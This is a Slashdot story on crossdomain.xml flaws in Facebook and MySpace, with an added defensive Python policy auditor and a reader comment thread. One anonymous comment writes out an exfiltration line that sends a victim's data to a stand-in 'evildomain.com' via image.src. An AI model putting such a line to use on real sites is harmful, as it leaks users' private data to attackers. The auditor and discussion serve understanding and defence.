Facebook and MySpace Backdoors Found, Fixed

Soulskill posted more than 4 years ago | from the oh-adobe-you-card dept.

Bug 106

jamie writes with news of a Facebook app developer who found a significant security hole while he was trying to get around function limitations for his application. Quoting: "Luckily — just with browser AJAX requests — a flash application hosted on domain X is unable to open a file on domain Y. If this would be possible, domain X [would be] able to access content on domain Y, and when the user is logged in on domain Y retrieve and post back any personal data. In certain cases this could limit a Flash application's capabilities. ... To resolve such issues, Adobe (Flash's developers) introduced a 'crossdomain.xml' file which could allow certain domains to access another domain, leading to cross-domain access by certain or all domains. While indeed Facebook locked the front door from any non-Facebook domain access via Flash, a simple subdomain change allowed any flash application (domain="*") to access its domain data." He found a similar problem in MySpace's crossdomain.xml. Both sites were notified, and they have implemented fixes.
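An added example, not part of the original story or the developer's write-up: a small Python auditor that parses the crossdomain.xml of every hostname serving a site and flags wildcard `allow-access-from` rules, the condition the summary describes on a subdomain. The hostnames and policy files are constructed samples, and the severity labels are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies (not the real Facebook or MySpace files).
# The main host is locked down; a sibling subdomain trusts every domain.
# These are trusted local strings; use a hardened XML parser for policies
# fetched from hosts you do not control.
SAMPLE_POLICIES = {
    "www.example.test": """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="apps.example.test"/>
</cross-domain-policy>""",
    "static.example.test": """<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>""",
    "api.example.test": """<cross-domain-policy>
  <allow-access-from domain="*.example.test" secure="false"/>
</cross-domain-policy>""",
}

# Sort order for the report: most urgent first.
SEVERITY_ORDER = {"high": 0, "error": 1, "medium": 2, "info": 3}


def classify_domain(pattern):
    """Map an allow-access-from domain pattern to (severity, reason)."""
    if not pattern:
        return "error", "rule has no domain attribute"
    if pattern == "*":
        return "high", "SWFs from any domain may read this host's responses"
    if pattern.startswith("*."):
        return "medium", f"every subdomain of {pattern[2:]} is trusted"
    return "info", "single named domain"


def finding(host, severity, domain, detail):
    return {"host": host, "severity": severity,
            "domain": domain, "detail": detail}


def audit_policy(host, xml_text):
    """Return the findings for one host's crossdomain.xml."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [finding(host, "error", None, f"policy does not parse: {exc}")]
    if root.tag != "cross-domain-policy":
        return [finding(host, "error", None,
                        f"unexpected root element <{root.tag}>")]
    findings = []
    for rule in root.iter("allow-access-from"):
        domain = (rule.get("domain") or "").strip()
        severity, detail = classify_domain(domain)
        findings.append(finding(host, severity, domain, detail))
        # secure defaults to true; false lets a SWF loaded over plain HTTP
        # read responses served over HTTPS.
        if (rule.get("secure") or "true").strip().lower() == "false":
            findings.append(finding(
                host, "medium", domain,
                "secure=false: HTTP-loaded SWFs may read HTTPS responses"))
    return findings


def audit_site(policies):
    """Audit every hostname of a site, not only the main one."""
    findings = []
    for host, xml_text in policies.items():
        findings.extend(audit_policy(host, xml_text))
    return sorted(findings,
                  key=lambda f: (SEVERITY_ORDER[f["severity"]], f["host"]))


def exposed_hosts(policies):
    """Hosts whose policy trusts every domain (domain="*")."""
    return sorted({f["host"] for f in audit_site(policies)
                   if f["severity"] == "high"})


if __name__ == "__main__":
    for f in audit_site(SAMPLE_POLICIES):
        print(f'{f["severity"]:6} {f["host"]:20} {f["domain"]!s:16} {f["detail"]}')
```

The check only helps if the host list covers every subdomain that answers with a logged-in user's data, since a locked-down main host says nothing about its siblings.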


Huh. (5, Insightful)

Velorium (1068080) | more than 4 years ago | (#29996036)

I wonder how many people figured this out and didn't report it.

Re:Huh. (4, Informative)

girlintraining (1395911) | more than 4 years ago | (#29996242)

I wonder how many people figured this out and didn't report it.

They didn't need to figure it out... Facebook lets people suck all that data out by making a game about vampires, pirates, farming, or god only knows whatever else is out there. Why go through the back door when the front door is already open and a welcome mat thrown out?

Re:Huh. (1)

Monkeedude1212 (1560403) | more than 4 years ago | (#29996610)

Exactly. If you are in the business of stealing a person's data you're probably a hacker. If you're a hacker you probably know some programming. If you know some programming you can throw together a Facebook game over the course of a weekend.

Then once 3 million people use your App - you can access their data. ...

Have they fixed that yet? They've been aware of THAT problem for months.

Re:Huh. (1)

Aladrin (926209) | more than 4 years ago | (#29996736)

Game!? Hah! Throw together a 'quiz' and you'll have them signing up in droves. It's ridiculous.

As far as 'over the course of a weekend', I can attest to that. I managed to get Zend Framework to authenticate with Facebook and write the basic structure of a game in a weekend, while I was watching TV, playing games, reading both English and Japanese, and I'm pretty sure I went out to see a movie, too. It's ridiculously easy to write something for Facebook.

Re:Huh. (1, Funny)

Anonymous Coward | more than 4 years ago | (#29999134)

araadarin san ha nihongo no hon o yomimasu ka? dou deshita ka?

Re:Huh. (1)

commodoresloat (172735) | more than 4 years ago | (#30002730)

I think "Tom" knew about it but he didn't tell anybody. Who knows, though; that guy is friends with everyone.

McCroskey (3, Funny)

Captain Splendid (673276) | more than 4 years ago | (#29996066)

Looks like I picked the wrong week to deactivate my FB account.

Re:McCroskey (2, Funny)

natehoy (1608657) | more than 4 years ago | (#29996176)

Surely you can't be serious?

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#29996274)

I am. And don't call me Shirley.

Damnit, people, can you see the problem here? (2, Funny)

Tetsujin (103070) | more than 4 years ago | (#29997360)

Surely you can't be serious?

I am. And don't call me Shirley.

People, do you not see the basic problem with using this joke in written format? Without a doubt this is a serious flaw in the English language: we are unable to use the "Don't call me Shirley" joke in written form because, while the words "Shirley" and "surely" are homonyms, the spelling is clearly different...

Ai propoz a simpl fix for this problem: Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz. Thas, thi standard "Shirley" jok wud bi exekyutid thus:
"Shirly yu kant bi sirius?"
"Ai em. And dont kal mi Shirly."

Ther, problem solvd.

Re:Damnit, people, can you see the problem here? (1)

mcgrew (92797) | more than 4 years ago | (#29997448)

Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz

Ok, is it spelled "kaw" (New England), Kower (south) Kore (midwest), Kwa (Nwoo Yawk)?

Is it window, winder, or windah?

And you spelled "uv" rong. See how this is such an incredibly BAD idea?

Re:Damnit, people, can you see the problem here? (1, Funny)

Tetsujin (103070) | more than 4 years ago | (#29998280)

Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz

Ok, is it spelled "kaw" (New England), Kower (south) Kore (midwest), Kwa (Nwoo Yawk)?

Is it window, winder, or windah?

And you spelled "uv" rong. See how this is such an incredibly BAD idea?

I did not spell "uv" wrong. The five vowels:

A E I O U

Take the following sounds:

Ah Eh EE Oh OO

This is in accordance with the usage of the vowels in other European languages, such as Spanish or Italian. Thus, the word "of" would be spelled "ov". "uv" would rhyme with "move"

Admittedly, some work would need to be done to refine the phonetic spelling system and to promote adoption and education of the new system. I figure in a generation or two we might be able to iron out these regional differences. Of course, some will resist these changes: if we can get the NSA involved to monitor SMS and internet usage and introduce FCC regulations requiring broadcasters and recording artists to always spell and pronounce things correctly, and institute a new bureau of ruthless and violent enforcement, it should be doable. The back-catalogue of music and literature will have to be either destroyed or republished, and owning old editions will have to be criminalized. It'd probably be a good idea to identify uncooperative parents and separate them from their children, so we can properly institutionalize them using the new system.

Oh, and we'll have to invade England, I think - this nonsense about English English being the authoritative version has got to stop. If we play our political cards right and keep anybody else from getting involved it should be a fairly straightforward war without too much loss of life. We may have to use a few tactical nuclear weapons, but I think once we've established a willingness to use them (say, on a minor city) the Brits will know we mean business. Once Britain is down I think it should be relatively easy to make Canada fall in line. Australians and New Zealanders might be a bit of a challenge since they're so well known for their weird accents - we could institute a temporary cultural embargo, that should prevent contamination until we're ready to deal with them.

In the end it'll all be worth it, though, 'cause we'll be able to use the "Don't call me Shirley" joke in writing and it will work properly. Really, all manner of homonym-based jokes will finally be open to use in writing. It will usher in a new golden age of literature.

Re:Damnit, people, can you see the problem here? (1)

clone53421 (1310749) | more than 4 years ago | (#29998916)

No, because then how do you distinguish between the sounds in "of" and "over"?

Ah = [a]fter = aftr
Eh = [e]ffort = efert
EE = [e]ven = iven
Oh = [o]ver = ovr
OO = wh[o] = hu

but you still haven't covered several other vowel sounds:

AA = [a]pe
Ih = [i]gloo
II = [i]vory, [ey]es
Uh = [o]f, [a]ffect, [u]nder

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29999130)

No, because then how do you distinguish between the sounds in "of" and "over"?

Long and short "o" sounds...

of = "ov"
over = "ouvr"

If we wanted to get really fancy we could introduce the schwa into the spelling system (to be more realistic for a moment - in reality a mad crusade to reform spelling would probably just adopt an existing, rigorous system of phonetics... I'm just working with basic latin characters 'cause it's easy for the purposes of this discussion...) but really, it's just as easy to leave it out.

but you still haven't covered several other vowel sounds:

AA = [a]pe
Ih = [i]gloo
II = [i]vory, [ey]es
Uh = [o]f, [a]ffect, [u]nder

Simple enough.

ape = "eip" (long "e" sound, terminating in "p")
igloo = "iglu" (straightforward, don't see the problem...)
ivory = "aivori", eyes = "aiz" (the "long I" is really just "a" transitioning into "i")
of = "ov", affect = "afekt", under = "andr"

People who pronounced "of" with an "a" sound would be escorted to re-education facilities for treatment... Their cases would be studied by re-education specialists, and if necessary they would be implanted with a small device which monitors their speech and delivers electric shocks when words are mispronounced... Priority cases would receive a version that uses a camera and OCR system to monitor their writing, as well.

Thus, the prosperity of the written form of the "Shirley" joke would be assured.

Re:Damnit, people, can you see the problem here? (1)

clone53421 (1310749) | more than 4 years ago | (#29999162)

of = "ov"
over = "ouvr"

If the "o" makes the same sound in "ouvr" as it does in "ov", then "ouvr" is next-to-impossible to pronounce (not to mention doesn't sound like it's supposed to).

If this is a phonetic system, the "o" has to always make the same sound.

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29999304)

of = "ov"
over = "ouvr"

If the "o" makes the same sound in "ouvr" as it does in "ov", then "ouvr" is next-to-impossible to pronounce (not to mention doesn't sound like it's supposed to).

If this is a phonetic system, the "o" has to always make the same sound.

Well, in any case, "o" doesn't appear in the word "Shirley" so the prosperity of the Shirley joke in written form is unaffected.

(In retrospect, it is possible that "av" would be a better spelling of "of" - despite my earlier statement that people who use this pronunciation would be detained and forcibly re-educated under the new system...)

If you want to be really realistic about what sort of phonetic system a vastly powerful, phonetics-system-crusading mad regime would choose to force standardization of English spellings, then probably they would use something more rigorous. But something with a bunch of Unicode characters wouldn't really work on Slashdot for the purposes of this discussion... :)

Though, I have to say - my original Shirley Joke comment here probably would have been funnier if it had been done up in full IPA or something...

Re:Damnit, people, can you see the problem here? (1)

clone53421 (1310749) | more than 4 years ago | (#29999676)

Meh. No offense, but I didn't think your "Shirley" joke was funny in the first place. It works just fine in written form because everyone knows it already and it got its humour from the original, not the written version.

Add-Homonym attack! (1)

Tetsujin (103070) | more than 4 years ago | (#30001554)

Meh. No offense, but I didn't think your "Shirley" joke was funny in the first place. It works just fine in written form because everyone knows it already and it got its humour from the original, not the written version.

No offense taken. Anybody who's gonna take a crack at being funny has to be willing to accept that sometimes it doesn't work out. :) I'm only funny sometimes - I can live with that.

Personally I don't think homonym-based jokes work at all well in text... By their nature they rely on ambiguity that doesn't exist in text. Sometimes it's a real drag, 'cause I like those kinds of jokes.

Re:Add-Homonym attack! (1)

clone53421 (1310749) | more than 4 years ago | (#30004930)

Anybody who's gonna take a crack at being funny has to be willing to accept that sometimes it doesn't work out.

As someone who has both gotten funny mods on posts that weren't intended to be funny, and gotten Anonymous Coward posts up-modded to +5 Funny when I thought they'd be a little too trollish/flamebaitish to risk posting as myself (that sucks, btw), I must say I understand and agree.

Re:Damnit, people, can you see the problem here? (1)

mcgrew (92797) | more than 4 years ago | (#29999228)

I did not spell "uv" wrong. The five vowels:

A E I O U

Take the following sounds:

Ah Eh EE Oh OO

This is in accordance with the usage of the vowels in other European languages, such as Spanish or Italian. Thus, the word "of" would be spelled "ov". "uv" would rhyme with "move"

Then spell "duh" using Spanish phonetics. You're arguing against your own point.

I figure in a generation or two we might be able to iron out these regional differences

We've had radio for a hundred years and TV for almost eighty. If you were right we'd already have gotten rid of regional and cultural differences.

Of course, some will resist these changes

Some meaning "almost everybody". Humorous comment!

Properly written English is far more understandable than spoken English.

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29999496)

Then spell "duh" using Spanish phonetics.

duh = "da" - or maybe just "d"

I'll admit that's not perfect. I believe this is a sound that would phonetically be marked with a "schwa". There are rigorous phonetics systems that do exist and can cover cases like this - for the purposes of outlining the proposed campaign to secure the prosperity of the written form of the "Shirley" joke (on a system that doesn't support Unicode) I've had to make do with the regular Latin character set.

I figure in a generation or two we might be able to iron out these regional differences

We've had radio for a hundred years and TV for almost eighty. If you were right we'd already have gotten rid of regional and cultural differences.

Well, no, because we haven't made a concerted effort (paired with violent and rigorous enforcement) to eliminate deviations from the established standard. Rather, we've allowed these deviations to flourish through pop culture, where their novelty earns them respect...

Of course, some will resist these changes

Some meaning "almost everybody".

Well, of course there will be substantial resistance. It just sounds nicer if one describes it as "some" resistance. But, as I said, I feel that the threat of nuclear weapons will be adequate to quell any large-scale opposition to this important change.

Humorous comment!

<MST3K>thank you!</MST3K>

Re:Damnit, people, can you see the problem here? (1)

pwfffff (1517213) | more than 4 years ago | (#29998316)

It wasn't a joke, it was a popular culture reference. I'd imagine that you're neither popular nor cultured; that would explain your total failure to 'get it'.

Re:Damnit, people, can you see the problem here? (1)

roguetrick (1147853) | more than 4 years ago | (#29998496)

Yes, Airplane! is for the fine cultured palate. The comment wasn't meant to be funny, it was meant as social commentary regarding new technology. Now let's all spout out some Monty Python quotes and give each other handjobs with our pinkies curled.

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29998816)

It wasn't a joke, it was a popular culture reference. I'd imagine that you're neither popular nor cultured; that would explain your total failure to 'get it'.

Dude, what are you talking about?

It's a joke and a pop culture reference. I get it. I've seen "Airplane". I use this joke myself more than is really appropriate.

But every time a cherry of an opportunity for a "Don't call me Shirley" joke appears in text the opportunity is wasted by the fact that the difference in spelling pretty much kills the joke. It's as if, by the simple act of presenting the joke in written form, the entire funny part of it has been extracted and painstakingly explained at length.

This is why I advocate a violent campaign to force all English speakers to adopt a truly phonetic system of spelling and standardized pronunciation: when this is accomplished, we will be able to use the "Shirley" joke in written form without it being blunted by the fact that the spelling is different. This will also mean that the book adaptation of "Airplane!" can finally be published!

Re:Damnit, people, can you see the problem here? (0)

Anonymous Coward | more than 4 years ago | (#30000060)

Get off the internet. It's clearly having an adverse effect on your sense of humor.

Or is that just how you are natchurallee?

Re:Damnit, people, can you see the problem here? (0)

Anonymous Coward | more than 4 years ago | (#30005884)

while the words "Shirley" and "surely" are homonyms, the spelling is clearly different

Thus, they are homophones, not homonyms.

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#29996418)

I want the kids in bed by nine, I want the dog fed, the yard watered, and the gate locked. And get a note to the milkman: no more cheese!

Re:McCroskey (1)

riff420 (810435) | more than 4 years ago | (#29996902)

In what fucking universe is what you said funny?

Re:McCroskey (1)

tenton (181778) | more than 4 years ago | (#29997834)

The one where people have actually watched the movie "Airplane!"

Re:McCroskey (1)

megamerican (1073936) | more than 4 years ago | (#29996180)

Looks like I picked the wrong week to deactivate my FB account.

Why? I've been on facebook since late 2004 and have never used a single app. You'd have been perfectly safe if you never used them or only used ones which you absolutely trusted.

Re:McCroskey (1)

Itninja (937614) | more than 4 years ago | (#29996236)

Wow...that's like the year FB started...back when it was The Facebook. Yet you have a 7 digit /. ID. Not sure how much geekcred that averages out to.

Re:McCroskey (4, Interesting)

darthflo (1095225) | more than 4 years ago | (#29996262)

Curiously few people seem to have gotten that. I've got an account named "John Doe" to try 'em out and another one which I add people I know to. Funnily, John Doe has several hundred friends already, despite not actually existing.

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#30003624)

Curiously few people seem to have gotten that. I've got an account named "John Doe" to try 'em out and another one which I add people I know to. Funnily, John Doe has several hundred friends already, despite not actually existing.

So that's why I get hate mail from people I don't even know, you insensitive clods...
-JD

Re:McCroskey (4, Insightful)

natehoy (1608657) | more than 4 years ago | (#29996266)

If I understand it, I have significant access to my friends' data on Facebook. When *I* sign up for an account, the app not only has access to my data, but any and all data I have access to. So you might not have given access to your data, but a friend might.

Plus, doesn't Facebook use Flash on a few of their ads? With the old crossdomain setting, Facebook's advertisers could also have gained access to your data.

Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.

Re:McCroskey (1)

CannonballHead (842625) | more than 4 years ago | (#29996704)

Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.

It's sad you have to tell people this.

It's like putting up fliers on telephone poles and signing your name (and picture) with it. And then asking how people found out.

Re:McCroskey (1)

ThatsNotPudding (1045640) | more than 4 years ago | (#29997430)

Don't post anything on Facebook.

Fixed it for you.

Re:McCroskey (1)

0100010001010011 (652467) | more than 4 years ago | (#29998770)

Facebook has nearly the equivalent of ACLs. Learn to use the groups and privacy functions. You can put people into groups and then give groups, or individual people access (or block access) to nearly any aspect of the site. (And I'm guessing by extension Apps that those people use).

Right now everything is locked down to the point that NO ONE can see anything by default. You can't even search me by name because I don't 'exist'. No pictures, no information, nothing.

I have "Family", "Friends", "Acquaintances", "Co-Workers", etc.

If I want to share that great night out at the bars, my Friends get access and then my cousin that's the same as me.

Those family vacation photos: Family and Co-Workers.

My full name address and cell phone: Family, Friends & Co-Workers.

Benign information: Acquaintances.

Re:McCroskey (2, Informative)

natehoy (1608657) | more than 4 years ago | (#29999050)

So if someone in your "Family" group wants to find out what kind of left-handed vampire they are, then the app they are running has the same access to your profile that they do.

That's the problem. You might trust the person, but they are running apps that might not be as trustworthy, and those apps adopt their Facebook authority to run.

At least that's how I understand it.

Well? (1)

commodoresloat (172735) | more than 4 years ago | (#30002748)

Get to the point, man. What kind of left-handed vampire are they?

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#30002934)

Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.

I don't have any problem telling my secrets to random strangers. Just don't tell my friends or my boss, and especially don't tell my family.

Re:McCroskey (1)

wiz31337 (154231) | more than 4 years ago | (#29996318)

I agree, unfortunately there are a lot of people that don't realize this and will click on any and every cool looking app out there.

However, even if your Facebook account is compromised people need to realize that they should only be putting information on their page that they want the whole world to see. If people would just ask themselves one question "Am I ok with my [boss, wife, mom, complete stranger] knowing this" before posting a lot of issues could be avoided.

Re:McCroskey (1)

bi_boy (630968) | more than 4 years ago | (#29996666)

The problem is if any of your friends used an app or took a quiz that means all of your information was compromised also.

Re:McCroskey (1)

rickb928 (945187) | more than 4 years ago | (#29996820)

Maybe someone can help you with that? Whether you know it or not?

Blunderware... (1, Interesting)

adosch (1397357) | more than 4 years ago | (#29996184)

I feel it as a personal accomplishment I *don't* have social network accounts on Facebook, Myspace and alike. It's bad enough people openly don't care about privacy or salvaging their identity, but ITFA, this clearly lets you 0wn any account in an auto-login status. And the guy is absolutely right... what typical, non-aware user doesn't? Glad to see all those bad script-kiddie hack sites that boast breaking into social network accounts for $100 a pop will lose a bit of their income to buy Mt. Dew and Oreos due to this being publicly uncovered...

Re:Blunderware... (2, Insightful)

maxume (22995) | more than 4 years ago | (#29996406)

Well, it is an achievement, much in the same way that not eating a bucket of KFC every day is an achievement.

Re:Blunderware... (0, Insightful)

Anonymous Coward | more than 4 years ago | (#29996416)

I feel it as a personal accomplishment I *don't* have social network accounts on Facebook, Myspace and alike.

I hate to break this to you.... wait, actually I rather enjoy it. I was just trying to be polite. Let's face it, you're on Slashdot. You're either an asshole, a moron, or a zealot. Possibly even a combination of all 3. People in real life don't want to associate with you, much less be your friend in a social network. Let's also be clear about something here. You aren't important enough for anyone to want your information. That's just the way it is. There is no reason for you to feel accomplished in not having an account. Nothing you have actually matters to anyone except you.

Re:Blunderware... (0, Flamebait)

Velorium (1068080) | more than 4 years ago | (#29996518)

Apparently you fit under the category of asshole? Sadly I already posted and can't mod this flamebait.

Re:Blunderware... (1)

tibman (623933) | more than 4 years ago | (#29996718)

There are actually accomplished non-asshole, intelligent, and fair-minded people here on slashdot. Somewhere... hidden among all the assholes.. probably..

Also, you are dead wrong :) data-mining anyone and everyone seems to be a very popular thing, whether you think the people are important or not.

Re:Blunderware... (1)

Nerdfest (867930) | more than 4 years ago | (#29996942)

There are actually accomplished non-asshole, intelligent, and fair-minded people here on slashdot.

Those would be the zealots.

Re:Blunderware... (1)

tibman (623933) | more than 4 years ago | (#29997262)

Zealot isn't like a class you pick when you signup for slashdot... though maybe a class system would clear the air a bit

Just saying! hah.

Re:Blunderware... (1)

Nerdfest (867930) | more than 4 years ago | (#29997426)

That my friend, is an excellent idea. You could even earn levels.

Re:Blunderware... (1)

colesw (951825) | more than 4 years ago | (#29997708)

And also earn Achievements!

Re:Blunderware... (1)

Dragonslicer (991472) | more than 4 years ago | (#29998894)

Zealot isn't like a class you pick when you signup for slashdot...

Yeah, you have to spend at least a couple months as a Marine or Zergling first.

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#29998526)

Somewhere... hidden among all the assholes.. probably..

It's called "kidnapping" and we're trying to keep it secret, so hush!

Re:Blunderware... (1)

TheRaven64 (641858) | more than 4 years ago | (#29996862)

I think you might be projecting a bit there. Lots of us have offline lives too. I don't have an account on any social networking sites either. I set up a mailing list for my friends to use to organise social activities. It's trivial for them to use: just send a mail to the address and everyone else gets it. Even the least technical of them can manage that, while a few of them have problems with Facebook. I don't get the shared online photo album stuff, but people show me photos at parties instead so I don't feel like I'm missing out.

Re:Blunderware... (1)

Fast Thick Pants (1081517) | more than 4 years ago | (#29997064)

You aren't important enough for anyone to want your information.

Incorrect if...

  • you have a bank account with cash
  • you have a credit card or decent credit
  • you've pissed off someone who's tech-savvy, or who'll hire a tech-savvy private investigator
  • you have an attractive cousin
  • cetera...

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#29997132)

Also if you ever apply for a job with a company that does any sort of background check. Although at this point it might be more of a red flag if they *can't* find anything about you online, 'cause that would mean you're sneaky.

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#30003474)

Also if you ever apply for a job with a company that does any sort of background check. Although at this point it might be more of a red flag if they *can't* find anything about you online, 'cause that would mean you're sneaky.

Or it could mean absolutely nothing at all. The background report is guaranteed to contain standard issue stuff that is available from public records.

-Where you live/have lived and some people that lived at the same residence in the same time period.

-credit history, bankruptcy filings, financial info

-criminal history, driver's license photo

etc

And possibly your work history if a linkedin bot or something built a profile for you because your name was on a corporate webpage.

They will find stuff online and your report will not be blank. You generate a trail merely by existing in society. This is what will be given as your background report and it will likely pass. Lack of a Myspace or Facebook would hardly be incriminating, unless you're applying for a job that requires you to have excellent networking and social skills. So since you're on slashdot I doubt that means you. ;)

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#29997306)

How the hell is this insightful? He insults the GP and then makes wrong conclusions while conveniently forgetting the fact that data mining is not targeted at anyone especially...

Re:Blunderware... (1)

Arthur Grumbine (1086397) | more than 4 years ago | (#29998202)

I'm guessing those mods are the kind of folks who are very sensitive about how many "friends" they have on social network sites, and don't like anyone raining on their parade - consequently supporting anyone who lashes out at people who don't need the constant sense of validation that social networks bring.

Re: Ogre updated his status! (0)

Anonymous Coward | more than 4 years ago | (#30003374)

I'm guessing those mods are the kind of folks who are very sensitive about how many "friends" they have on social network sites, and don't like anyone raining on their parade - consequently supporting anyone who lashes out at people who don't need the constant sense of validation that social networks bring.

NNNNNNEEEEEERRRRDDDDS!!!

Re:Blunderware... (1)

Dhalka226 (559740) | more than 4 years ago | (#30001104)

Let's face it, you're on Slashdot. You're either an asshole, a moron, or a zealot.

The irony abounds.

Re:Blunderware... (1)

MrPhilby (1493541) | more than 4 years ago | (#30001830)

I find it hard to choose

Re:Blunderware... (3, Funny)

imakemusic (1164993) | more than 4 years ago | (#29996474)

I feel it as a personal accomplishment I *don't* have social network accounts on Facebook, Myspace and alike.

Well, you say that but we all know it's because you don't have any friends.

Re:Blunderware... (1)

adosch (1397357) | more than 4 years ago | (#29997394)

...no, it's not anything like that. It's so I don't have to be like you and brag about your mega-uber friend list which is solely derived off your MySpace hit counter. Friends don't come in quantities, they are counted by quality. Wait until the next viral social fag-wagon hits... you'll be the next emo kid to slit your wrists b/c you don't have any more "friends".

Re:Blunderware... (1)

Dragonslicer (991472) | more than 4 years ago | (#29998960)

It's so I don't have to be like you and brag about your mega-uber friend list which is solely derived off your MySpace hit counter.

Instead you can brag about how you're too good to have an account on any such sites.

I think The Onion needs to do a follow-up to the feature article about the man who doesn't have cable television.

Re:Blunderware... (1)

adosch (1397357) | more than 4 years ago | (#29999664)

Instead you can brag about how you're too good to have an account on any such sites.

...too good? or not a passive, social parasite looking for any outlet to 'get noticed' or 'get attention'. You choose to waste your time posting to the world about what you did every 5 minutes for the last hour with your My-Twit-Face account and 'hope' your friends make time to observe it. I simply take that time and spend it with my friends.

Re:Blunderware... (1)

mcgrew (92797) | more than 4 years ago | (#29998474)

Hey, you're right! [slashdot.org] He does have one fan, [slashdot.org] though.

Re:Blunderware... (1)

Culture20 (968837) | more than 4 years ago | (#29996648)

I feel it as a personal accomplishment I *don't* have social network accounts on Facebook, Myspace and alike.

Wait, so that's a fake you on FB whose last status update was "I <3 my little ponies"? I can't be your friend any more. I like the FB you better.

Re:Blunderware... (1)

tibman (623933) | more than 4 years ago | (#29996904)

I will agree with you that it's a small accomplishment to not have a social networking account anywhere. Mostly because everyone goes "sign up so we can do X together" or "sign up so we can be 'in a relationship' together" or whatever other viral method of spreading is popular today.

I still have an LJ account from around the time i first signed up at slashdot. *sigh* yes! i know that is a blog.. and yes i know that blogs aren't cool anymore. But what i discovered is that when it became uncool.. suddenly the quality of posts and comments improved! It's obvious why in hindsight, really.

Re:Blunderware... (1)

JonJ (907502) | more than 4 years ago | (#29999244)

"sign up so we can be 'in a relationship' together"

Be in a what together? Does this require that I leave my basement? In that case, no thanks!

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#30003334)

Want to know a little secret? No one cares. By acting like having a Facebook account is a big deal...you are in fact making it a big deal.

People like to think that everything they post will be immortalized or that it has incredible importance, but it won't and it doesn't. Someday Facebook will die and will take all your bitchy wall posts, drunken status updates, and embarrassing photos with it. Choose to use it or don't. Choose to post all your info on it or choose not to. Neither decision is really that big of a deal.

As far as breaking into accounts...are you twelve or something? Who would care? What's the former account owner to do? End his life, or set up a new account? "A whole evening ruined! Curse you, Facebook hackers!".

It's just a crappy contact list/message board app after all, and not the be all end all of the world it exists in. To consider that some people think it actually *is* their identity is absurd beyond belief. I don't know whether to laugh, cry or shrug.

What about image.src? (0)

Anonymous Coward | more than 4 years ago | (#29996260)

Couldn't an evil app always send out sensitive information via:

image.src="http://evildomain.com/script?username=victim&sensitiveinfo=gotcha"

Re:What about image.src? (1)

gazbo (517111) | more than 4 years ago | (#29996656)

This story's about accessing private data in the first place, not sending the data once accessed.

Re:What about image.src? (0)

Anonymous Coward | more than 4 years ago | (#29997450)

I was under the impression that the crossdomain.xml file was applied to the server hosting the flash app, but it looks like it is the other way around. In my opinion, this is bassackwards.

maybe (0)

Anonymous Coward | more than 4 years ago | (#29996328)

this is why the fb chat plugin for pidgin/adium is broken?

Re:maybe (1)

Velorium (1068080) | more than 4 years ago | (#29996560)

That's an interesting thought. Throw Digsby into the mix too, as they had a patch just the other day to fix facebook chat.

Re:maybe (1)

F-3582 (996772) | more than 4 years ago | (#29996720)

They just got updated with a fix for that issue.

How much did paypal pay for that domain? (1)

OCURServant (1526983) | more than 4 years ago | (#29996362)

God damn paypal! Always messing things up

Damn (1)

kenp2002 (545495) | more than 4 years ago | (#29996446)

There went my plan for consulting for HR departments by checking Facebook and Myspace profiles. Guess I am stuck snooping Slashdot accounts and news sites for $10 a person.

Re:Damn (1)

MillionthMonkey (240664) | more than 4 years ago | (#29998546)

Ask the guy if you can buy (share) his identity so you can take the MySpace job offer while he takes the one from Facebook.

Maybe YOU can be the one at Facebook instead, if you offer enough cash, but they might be better able to figure out who you are.

Facebook is a buggy mess (4, Insightful)

WankersRevenge (452399) | more than 4 years ago | (#29996594)

It amazes me that facebook rose to prominence in the way it did. Out of all the sites I have ever used, Facebook is the worst when it comes to bugs. It simply floors me at how much bad code is pushed out to production servers or how many things break on a daily basis. I'm not talking simple copy bugs, but full on showstopping bugs. At one point, I was filing bug reports to them on a daily basis. If there is any qa department, it is incredibly lax. I'm guessing it's just a couple of interns sniffing for a gig. The only reason I'm using facebook is to grow my zombie blog, and once I reach a point where my traffic isn't dependent on that site, I'm dropping them like a friggin rock. And it will be a glorious day indeed.

Re:Facebook is a buggy mess (1)

Chameleon Man (1304729) | more than 4 years ago | (#29997342)

This interview [youtube.com] gives a brief glimpse as to what Facebook's office dynamic is like. Surprised they get anything done.

Re:Facebook is a buggy mess (1)

mcgrew (92797) | more than 4 years ago | (#29998778)

Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.

I see you've never been to slashdot.

Re:Facebook is a buggy mess (1)

Dragonslicer (991472) | more than 4 years ago | (#29998998)

Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.

All three of them?

Re:Facebook is a buggy mess (1)

stephanruby (542433) | more than 4 years ago | (#29999654)

Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.

I'm guessing you've never used friendster, myspace, or slashdot.

Re:Facebook is a buggy mess (1)

commodoresloat (172735) | more than 4 years ago | (#30002766)

The only reason I'm using facebook is to grow my zombie blog....

There was once a day you just didn't hear sentences like this.

Now if only Adobe would... (1)

Dracos (107777) | more than 4 years ago | (#29996796)

Remove Flash's ability for cross-domain cookies. Browser plugins should use the browser's cookie storage, IMO.

